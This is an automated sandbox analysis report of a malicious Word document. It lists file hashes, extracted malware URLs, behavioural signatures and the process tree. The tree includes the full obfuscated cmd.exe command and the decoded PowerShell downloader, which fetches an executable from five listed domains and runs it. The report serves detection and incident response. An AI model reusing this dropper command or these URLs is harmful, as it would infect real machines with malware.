Analysis
-
max time kernel
132s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 08:52
Behavioral task
behavioral1
Sample
599113dce8c83987e7f0728ab5094c0f_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
599113dce8c83987e7f0728ab5094c0f_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
599113dce8c83987e7f0728ab5094c0f_JaffaCakes118.doc
-
Size
72KB
-
MD5
599113dce8c83987e7f0728ab5094c0f
-
SHA1
dd68ecad930b13b9aae7fc2a1cc8d71fde698d77
-
SHA256
3bf26b612f3b764439cc3e44e5bde176d7febce6acb7756de8f0e9b34223a28e
-
SHA512
51a297d72d3d79b2a49f47bcbaa2353ffa2a406265c77e134b59e990eb14fab9f3bdf2b786e6fac1f2d6171b9e7c1149f8fc6437e5160e8442ef34b0ad4e20c0
-
SSDEEP
768:npJcaUitGAlmrJpmxlzC+w99NB38+1ove9A8pw8jZlerbc2:nptJlmrJpmxlRw99NB38+ave9ANT
Malware Config
Extracted
http://grupoperfetto.com.br/k0K5MRB
http://pasoprage.nl/CYcS488Bs
http://stoobb.nl/Hlathh5I
http://psselection.com/u2nU7nDwy5
http://oooka.biz/o0tiZ3XfbW
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 5048 2996 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exeflow pid process 27 3988 powershell.exe 28 3988 powershell.exe 36 3988 powershell.exe 37 3988 powershell.exe 46 3988 powershell.exe 48 3988 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid process 5048 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2996 WINWORD.EXE 2996 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3988 powershell.exe 3988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3988 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2996 WINWORD.EXE 2996 WINWORD.EXE 2996 WINWORD.EXE 2996 WINWORD.EXE 2996 WINWORD.EXE 2996 WINWORD.EXE 2996 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 2996 wrote to memory of 5048 2996 WINWORD.EXE cmd.exe PID 2996 wrote to memory of 5048 2996 WINWORD.EXE cmd.exe PID 5048 wrote to memory of 3988 5048 cmd.exe powershell.exe PID 5048 wrote to memory of 3988 5048 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\599113dce8c83987e7f0728ab5094c0f_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\SYSTEM32\cmd.execmd /V^:/C"^s^et ^pWA^h= ^ ^ ^ ^ ^ ^}^}^{hc^tac}^;^kaer^b;Uq^j$ ^m^et^I-e^k^ovn^I;)Uqj$ ,iT^h$(^el^iF^d^a^oln^w^o^D.kGK${yr^t{)nR^L$^ n^i i^Th^$(^hc^a^erof^;^'^e^xe.'+^ZL^W^$+'^\'^+cilbu^p^:vn^e^$^=Uq^j^$^;'^552^' ^=^ Z^LW$;)'^@^'(ti^l^pS.'W^bf^X3Z^i^t^0o/^z^i^b.^ak^ooo//:^pt^t^h@^5y^wDn7^Un2u/moc^.n^oitc^e^le^ss^p//:p^tt^h^@^I5h^h^ta^lH/^ln^.b^b^o^o^ts//^:ptt^h^@^sB8^8^4Sc^YC/ln^.^egar^po^s^a^p//^:p^t^th^@^BR^M^5^K^0^k/rb^.moc^.^ot^t^efr^epop^urg//:^p^tt^h^'^=nRL^$;tnei^lC^beW^.teN ^tc^e^j^b^o^-^wen=kG^K^$^ l^l^ehsrew^o^p&&^f^or /^L %N ^in (^36^3^;^-^1^;^0)d^o ^se^t 4^Iw^s=!4^Iw^s!!^pWA^h:~%N,1!&&^if %N=^=^0 c^a^l^l %4^Iw^s:^~^-^3^6^4%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $KGk=new-object Net.WebClient;$LRn='http://grupoperfetto.com.br/k0K5MRB@http://pasoprage.nl/CYcS488Bs@http://stoobb.nl/Hlathh5I@http://psselection.com/u2nU7nDwy5@http://oooka.biz/o0tiZ3XfbW'.Split('@');$WLZ = '255';$jqU=$env:public+'\'+$WLZ+'.exe';foreach($hTi in $LRn){try{$KGk.DownloadFile($hTi, $jqU);Invoke-Item $jqU;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
46KB
MD5ade8057d161aadc9cf93fb9f021766b2
SHA1e9d70d4a77bdbe859114d438667fa85d8122ffbf
SHA25697b15a59f8d00a28a6f5c7d6d442068bd9afab8ce656872fb9110772787a40ae
SHA51200f0149076a87cb6ecbb7cea0bf206c0ffa7e571b9eec9f0fe78d423adf9b40d82784b8d151dc7cb16d57460a5f8c70d4a24d597f73112d917ce9ec6d29c3c4c